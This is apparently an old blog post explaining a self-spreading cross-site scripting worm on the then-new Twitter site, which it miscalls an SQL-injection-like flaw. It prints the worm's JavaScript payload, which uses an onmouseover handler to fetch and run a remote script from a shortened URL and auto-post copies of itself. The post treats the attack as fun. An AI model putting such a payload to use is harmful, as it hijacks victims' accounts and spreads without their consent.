So it seems the new twitter.com has a “virus” going around.
Few minutes ago my twitter stream filled up with strange jQuery calls so I looked into it.
Apperantly the new Twitter website is colunerable to a simple SQL-Injection like attack.
It’ll just spit out to the page whatever HTML code you write on your status…
So, the exploit work like this:
User writes the following status line:
The onmouseover event fetches and executes a remote JS code from
The remote script (which is not subject to size limits like the script embedded in the user’s status can basically do whatever the hacker wants.
This one just plays with the page’s HTML to submit a new tweet (from step #1) and spread itself on:
$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"\ onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/"); $('.status-update-form').submit(); $('#status-field-char-counter').html("ekampf owns you!"); $('#status').val('I read how to do this on DeveloperZen.com'); $('.status-update-form').submit();
Besides submitting tweets, you can pretty much do whatever you want with the page’s UI etc…
lots of fun…